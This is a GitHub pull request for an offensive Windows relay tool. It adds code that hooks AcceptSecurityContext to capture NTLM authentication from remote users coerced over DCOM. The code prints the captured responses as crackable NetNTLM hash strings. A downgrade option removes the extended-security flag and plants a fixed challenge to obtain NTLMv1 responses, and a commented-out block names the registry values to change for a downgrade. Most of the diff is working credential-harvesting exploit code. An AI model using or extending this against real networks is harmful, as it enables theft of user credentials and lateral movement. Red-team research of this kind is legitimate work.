### PR TITLE
NTLM Downgrade for Hash retrieval

### DIFF
--- a/Exploit/RemoteKrbRelay/Helpers/Helpers.cs
+++ b/Exploit/RemoteKrbRelay/Helpers/Helpers.cs
@@ -1,4 +1,4 @@
-﻿using System;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Globalization;
@@ -15,6 +15,50 @@ namespace RemoteKrbRelay.Helpers
 {
     class Helpers
     {
+
+        public static string parseNTLM(byte[] ntlm2, byte[] ntlm3)
+        {
+            int ntlm3Pattern = Helpers.PatternAt(ntlm3, new byte[] { 0x4e, 0x54 });
+            ntlm3 = ntlm3.Skip(ntlm3Pattern).ToArray();
+
+            ushort ntlmv3_len = BitConverter.ToUInt16(ntlm3, 20);
+            int domainLen = BitConverter.ToUInt16(ntlm3.Skip(28).Take(2).ToArray(), 0);
+            int userLen = BitConverter.ToUInt16(ntlm3.Skip(36).Take(2).ToArray(), 0);
+            int hostnameLen = BitConverter.ToUInt16(ntlm3.Skip(44).Take(2).ToArray(), 0);
+            int domainOffset = BitConverter.ToInt32(ntlm3.Skip(32).Take(4).ToArray(), 0);
+            int userOffset = BitConverter.ToInt32(ntlm3.Skip(40).Take(4).ToArray(), 0);
+            int hostnameOffset = BitConverter.ToInt32(ntlm3.Skip(48).Take(4).ToArray(), 0);
+            string domain = Encoding.Unicode.GetString(ntlm3.Skip(domainOffset).Take(domainLen).ToArray());
+            string user = Encoding.Unicode.GetString(ntlm3.Skip(userOffset).Take(userLen).ToArray());
+            string hostname = Encoding.Unicode.GetString(ntlm3.Skip(hostnameOffset).Take(hostnameLen).ToArray());
+            string challenge = Helpers.ByteArrayToString(ntlm2.Skip(24).Take(8).ToArray());
+            string part1;
+            string part2;
+            if (ntlmv3_len == 24)
+            {
+                int LmType3Offset = BitConverter.ToUInt16(ntlm3.Skip(16).Take(2).ToArray(), 0);
+                int ntlmType3Offset = BitConverter.ToUInt16(ntlm3.Skip(24).Take(2).ToArray(), 0);
+                part1 = Helpers.ByteArrayToString(ntlm3.Skip(LmType3Offset).Take(24).ToArray());
+                part2 = Helpers.ByteArrayToString(ntlm3.Skip(ntlmType3Offset).Take(24).ToArray());
+            }
+            else
+            {
+                int ntlmType3Length = BitConverter.ToUInt16(ntlm3.Skip(20).Take(2).ToArray(), 0);
+                int ntlmType3Offset = BitConverter.ToUInt16(ntlm3.Skip(24).Take(2).ToArray(), 0);
+                part1 = Helpers.ByteArrayToString(ntlm3.Skip(ntlmType3Offset).Take(16).ToArray());
+                part2 = Helpers.ByteArrayToString(ntlm3.Skip(ntlmType3Offset + 16).Take(ntlmType3Length - 16).ToArray());
+            }
+            Console.WriteLine("[*] NTLM3");
+            Console.WriteLine(user + "::" + domain + ":" + challenge + ":" + part1 + ":" + part2);
+
+            //session key
+            //Console.WriteLine("[*] NTLM3dump");
+            //Console.WriteLine(Helpers.ByteArrayToString(ntlm3));
+            byte[] session_key = ntlm3.Skip(52).Take(8).ToArray();
+            //Console.WriteLine(Helpers.ByteArrayToString(session_key));
+
+            return user + "::" + domain + ":" + challenge + ":" + part1 + ":" + part2;
+        }
         public static string GetObjectSidForComputerName(LdapConnection ldapConnection, string computerName, string searchBase)
         {
             var searchFilter = $"(sAMAccountName={computerName}$)";
@@ -240,6 +284,7 @@ namespace RemoteKrbRelay.Helpers
             }
             return ret;
         }
+
 
         public static int PatternAt(byte[] src, byte[] pattern, bool firstMatch = false)
         {

--- a/Exploit/RemoteKrbRelay/Helpers/Natives.cs
+++ b/Exploit/RemoteKrbRelay/Helpers/Natives.cs
@@ -1,4 +1,4 @@
-﻿using System;
+using System;
 using System.Runtime.InteropServices;
 using System.Text;
 
@@ -264,6 +264,19 @@ namespace RemoteKrbRelay.Helpers
             SecDataRep TargetDataRep,
             [In, Out] SecHandle phNewContext,
             [In, Out] SecurityBufferDescriptor pOutput,
+            out AcceptContextRetFlags pfContextAttr,
+            [Out] SECURITY_INTEGER ptsExpiry
+        );
+
+        [DllImport("Secur32.dll", CharSet = CharSet.Unicode)]
+        public static extern SecStatusCode AcceptSecurityContext(
+            [In] SecHandle phCredential,
+            [In] SecHandle phContext,
+            [In] SecurityBufferDescriptor pInput,
+            AcceptContextReqFlags fContextReq,
+            SecDataRep TargetDataRep,
+            [In, Out] SecHandle phNewContext,
+            [In, Out] IntPtr pOutput,
             out AcceptContextRetFlags pfContextAttr,
             [Out] SECURITY_INTEGER ptsExpiry
         );

--- a/Exploit/RemoteKrbRelay/Program.cs
+++ b/Exploit/RemoteKrbRelay/Program.cs
@@ -1,4 +1,4 @@
-﻿using System;
+using System;
 using System.Diagnostics;
 using System.Linq;
 using System.Text;
@@ -39,6 +39,8 @@ namespace RemoteKrbRelay
         public static string session = "";
         public static string moduleName = "System"; // Try everything from FindAvailablePort tool :)
         public static bool useSSL = false;
+        public static bool useNTLM = false;
+        public static bool downgrade = false;
         public static bool debug = false;
         public static bool attackDone = false;
 
@@ -182,6 +184,14 @@ namespace RemoteKrbRelay
 
                     case "-secure":
                         Options.useSSL = true;
+                        break;
+
+                    case "-ntlm":
+                        Options.useNTLM = true;
+                        break;
+                    
+                    case "-downgrade":
+                        Options.downgrade = true;
                         break;
 
                     case "-spn":
@@ -459,6 +469,26 @@ namespace RemoteKrbRelay
                 Helpers.Helpers.PrintStaticFields(typeof(Options));
             }
 
+            if (Options.downgrade)
+            {
+                // For the case, that we are local administrator and want to retrieve the NTLMv1 Hash from logged in users,
+                // we could connect to the remote registry and downgrade NTLM to also sent v1 Hashes. Todo for later maybe
+                
+                /* This code is just for local settings, won't help for the mentioned use case but to have the entries in mind
+                private static void SetDowngrade(out object oldValue_LMCompatibilityLevel, out object oldValue_NtlmMinClientSec, out object oldValue_RestrictSendingNTLMTraffic)
+                {
+                    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", out oldValue_LMCompatibilityLevel);
+                    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
+
+                    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", out oldValue_NtlmMinClientSec);
+                    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
+
+                    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", out oldValue_RestrictSendingNTLMTraffic);
+                    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
+                }*/
+                // 
+            }
+
             Debug.WriteLine($"[?] Using SPN {Options.spn}");
 
             // END PARSING ARGS
@@ -558,6 +588,7 @@ namespace RemoteKrbRelay
             Console.WriteLine("\t-d/--domain : current (target) domain");
             Console.WriteLine("\t-dc/--domaincontoller : target DC");
             Console.WriteLine("\t-local : current computer hostname. This host will be in OBJREF.");
+            Console.WriteLine("\t-ntlm : Just to get some hashes instead.");
             Console.WriteLine();
             Console.WriteLine("[ATTACK OPTIONS]");
             Console.WriteLine("\t[SMB OPTIONS (Relay to SMB)]");

--- a/Exploit/RemoteKrbRelay/Relay/Relay.cs
+++ b/Exploit/RemoteKrbRelay/Relay/Relay.cs
@@ -1,4 +1,4 @@
-﻿using NetFwTypeLib;
+using NetFwTypeLib;
 using RemoteKrbRelay.Helpers;
 using RemoteKrbRelay.Relay.Com;
 using System;
@@ -29,8 +29,15 @@ namespace RemoteKrbRelay.Relay
             var table = (SecurityFunctionTable)Marshal.PtrToStructure(functionTable, typeof(SecurityFunctionTable));
             Debug.WriteLine($"[!] Old AcceptSecurityContex: {table.AcceptSecurityContex}");
 
-            var AcceptSecurityContextDeleg = new AcceptSecurityContextFunc(AcceptSecurityContext_); ;
-
+            var AcceptSecurityContextDeleg = new AcceptSecurityContextFunc(AcceptSecurityContext_);
+            if (Options.useNTLM)
+            { 
+                AcceptSecurityContextDeleg = new AcceptSecurityContextFunc(AcceptSecurityContext_ntlm);
+            }
+            else
+            {
+                AcceptSecurityContextDeleg = new AcceptSecurityContextFunc(AcceptSecurityContext_);
+            }
             var bAcceptSecurityContext = BitConverter.GetBytes(Marshal.GetFunctionPointerForDelegate(AcceptSecurityContextDeleg).ToInt64());
             var oAcceptSecurityContext = RemoteKrbRelay.Helpers.Helpers.FieldOffset<SecurityFunctionTable>("AcceptSecurityContex");
             Marshal.Copy(bAcceptSecurityContext, 0, (IntPtr)functionTable + oAcceptSecurityContext, bAcceptSecurityContext.Length);
@@ -42,6 +49,12 @@ namespace RemoteKrbRelay.Relay
             Debug.WriteLine("[*] Rewriting PEB");
             var dwAuthnSvc = 16;
             var pPrincipalName = Options.spn;
+
+            if (Options.useNTLM)
+            {
+                dwAuthnSvc = 10;
+                pPrincipalName = null;
+            }
 
             var svcs = new SOLE_AUTHENTICATION_SERVICE[] {
                 new SOLE_AUTHENTICATION_SERVICE() {
@@ -205,6 +218,135 @@ namespace RemoteKrbRelay.Relay
                 Console.WriteLine("[*] AcceptSecurityContext: {0}", ret);
                 Console.WriteLine("[*] fContextReq: {0}", fContextReq);
             }
+            return ret;
+        }
+
+        public static byte[] ntlm1 = new byte[] { };
+        public static byte[] ntlm2 = new byte[] { };
+        public static byte[] ntlm3 = new byte[] { };
+        public static string targetFQDN = "";
+        public static SecStatusCode AcceptSecurityContext_ntlm(
+            [In] SecHandle phCredential,
+            [In] SecHandle phContext,
+            [In] SecurityBufferDescriptor pInput,
+            AcceptContextReqFlags fContextReq,
+            SecDataRep TargetDataRep,
+            [In, Out] SecHandle phNewContext,
+            [In, Out] IntPtr pOutput,
+            out AcceptContextRetFlags pfContextAttr,
+            [Out] SECURITY_INTEGER ptsExpiry)
+        {
+            if (ntlm1.Length == 0)
+            {
+                ntlm1 = pInput.ToByteArray().Take(pInput.ToByteArray().Length - 32).ToArray();
+                int ntlm1Pattern = RemoteKrbRelay.Helpers.Helpers.PatternAt(ntlm1, new byte[] { 0x4e, 0x54 });
+                ntlm1 = ntlm1.Skip(ntlm1Pattern).ToArray();
+                Console.WriteLine("[*] NTLM1");
+                Console.WriteLine(RemoteKrbRelay.Helpers.Helpers.ByteArrayToString(ntlm1));
+                ticket = ntlm1;
+            }
+            else
+            {
+                ntlm3 = pInput.ToByteArray().Take(pInput.ToByteArray().Length - 32).ToArray();
+                int ntlm3Pattern = RemoteKrbRelay.Helpers.Helpers.PatternAt(ntlm3, new byte[] { 0x4e, 0x54 });
+                ntlm3 = ntlm3.Skip(ntlm3Pattern).ToArray();
+                ticket = ntlm3;
+
+                if (ntlm2.Length > 1 && ntlm3.Length > 1)
+                {
+                    RemoteKrbRelay.Helpers.Helpers.parseNTLM(ntlm2, ntlm3);
+                }
+                if (string.IsNullOrEmpty(targetFQDN))
+                {
+                    pfContextAttr = AcceptContextRetFlags.None;
+                    return SecStatusCode.SEC_E_LOGON_DENIED;
+                }
+            }
+
+            //string service = spn.Split('/').First();
+            //if (service.ToLower() == "ldap")
+            //{
+            //    Ldap.Connect();
+            //}
+            //else if (service.ToLower() == "http")
+            //{
+            //    Http.Connect();
+            //}
+            //else if (service.ToLower() == "cifs")
+            //{
+            //    Smb.Connect();
+            //}
+
+            //overwrite security buffer
+            var pOutput2 = new SecurityBufferDescriptor(12288);
+            var ogSecDesc = (SecurityBufferDescriptor)Marshal.PtrToStructure(pOutput, typeof(SecurityBufferDescriptor));
+            var ogSecBuffer = (SecurityBuffer)Marshal.PtrToStructure(ogSecDesc.BufferPtr, typeof(SecurityBuffer));
+
+            SecStatusCode ret;
+            if (!string.IsNullOrEmpty(targetFQDN))
+            {
+                ret = AcceptSecurityContext(
+                phCredential,
+                phContext,
+                pInput,
+                fContextReq,
+                TargetDataRep,
+                phNewContext,
+                pOutput2,
+                out pfContextAttr,
+                ptsExpiry);
+            }
+            else
+            {
+                ret = AcceptSecurityContext(
+                phCredential,
+                phContext,
+                pInput,
+                fContextReq,
+                TargetDataRep,
+                phNewContext,
+                pOutput,
+                out pfContextAttr,
+                ptsExpiry);
+            }
+
+            var ogSecDesc2 = (SecurityBufferDescriptor)Marshal.PtrToStructure(pOutput, typeof(SecurityBufferDescriptor));
+            var ogSecBuffer2 = (SecurityBuffer)Marshal.PtrToStructure(ogSecDesc2.BufferPtr, typeof(SecurityBuffer));
+            byte[] ntlm2bytes = ogSecDesc2.ToByteArray();
+            int ntlm2Pattern = RemoteKrbRelay.Helpers.Helpers.PatternAt(ntlm2bytes, new byte[] { 0x4e, 0x54 });
+            
+            if (Options.downgrade)
+            {
+                //disable extended security
+                byte temp = (byte)(Marshal.ReadByte(ogSecBuffer2.Token + ntlm2Pattern + 22) & 0xF7);
+                Marshal.WriteByte(ogSecBuffer2.Token + ntlm2Pattern + 22, 0, temp);
+
+                //replace challenge
+                byte[] challengebytes = RemoteKrbRelay.Helpers.Helpers.StringToByteArray("1122334455667788");
+                Marshal.Copy(challengebytes, 0, (IntPtr)ogSecBuffer2.Token + ntlm2Pattern + 24, challengebytes.Length);
+            }
+
+            if (string.IsNullOrEmpty(targetFQDN))
+            {
+                //null out reserved bytes
+                byte[] nbytes = new byte[8];
+                Marshal.Copy(nbytes, 0, (IntPtr)ogSecBuffer2.Token + ntlm2Pattern + 32, nbytes.Length);
+
+                ntlm2 = ogSecDesc2.ToByteArray();
+                ntlm2 = ntlm2.Skip(ntlm2Pattern).ToArray();
+                Console.WriteLine("[*] NTLM2");
+                Console.WriteLine(RemoteKrbRelay.Helpers.Helpers.ByteArrayToString(ntlm2));
+            }
+            else
+            {
+                byte[] nbytess = new byte[254];
+                Marshal.Copy(ntlm2, 0, ogSecBuffer.Token + 116, ntlm2.Length); // verify this 116 offset?
+                Marshal.Copy(nbytess, 0, (IntPtr)ogSecBuffer.Token + ntlm2.Length + 116, nbytess.Length);
+            }
+
+            Console.WriteLine("[*] AcceptSecurityContext: {0}", ret);
+            Console.WriteLine("[*] fContextReq: {0}", fContextReq);
+
             return ret;
         }
 


### PR DESCRIPTION
![Pasted image 20250403143726](https://github.com/user-attachments/assets/7a8d632b-ad78-4a0b-884f-663b70a35d53)

This Pull Request add's downgrading the incoming authentication to NTLM to trigger incoming NetNtlmv2 Hashes from remote systems. This is only possible, when you already have an administrative user account for the remote system - but in those cases you can get incoming authentication from any loggedon user via `Interactive User` configured CLSIDs which allow remote activation/launch.

More information can be found here:

https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1